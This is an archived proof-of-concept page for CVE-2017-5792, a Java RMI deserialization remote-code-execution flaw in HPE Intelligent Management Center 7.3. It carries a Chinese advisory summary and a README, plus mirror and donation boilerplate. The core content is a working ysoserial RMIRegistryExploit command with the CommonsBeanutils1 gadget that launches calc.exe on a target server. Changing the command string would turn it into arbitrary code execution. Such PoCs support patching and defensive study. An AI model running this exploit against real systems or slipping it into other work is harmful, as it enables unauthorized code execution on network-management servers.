CVE-2017-5792 PoC — HP Intelligent Management Center 安全漏洞

Source

https://github.com/scanfsec/HPE-iMC-7.3-RMI-Java-Deserialization

Associated Vulnerability

Title:HP Intelligent Management Center 安全漏洞 (CVE-2017-5792)
Description:HP Intelligent Management Center（IMC）是美国惠普（HP）公司的一套网络智能管理中心解决方案。该解决方案可提供整个网络范围的可视性，实现对资源、服务和用户的全面管理。 HP IMC 7.2 E0403P06版本中存在远程代码执行漏洞。攻击者可利用该漏洞在受影响的应用程序上下文中执行任意代码。

Description

CVE-2017-5792

Readme

# HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability

# CVE ID 
CVE-2017-5792

# Exploit
Vendor Homepage: www.hpe.com

Version: iMC PLAT v7.3 (E0504) Standard

Tested on: Windows Server 2008 R2 Enterprise 64-bit

## note that this PoC will launch calc.exe
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe

## Software Link
https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=

# See Also
http://zerodayinitiative.com/advisories/ZDI-18-137/

File Snapshot


 [4.0K]  /data/pocs/2edfcfac67094877c06183bb69b889acd0926688
└── [ 634]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!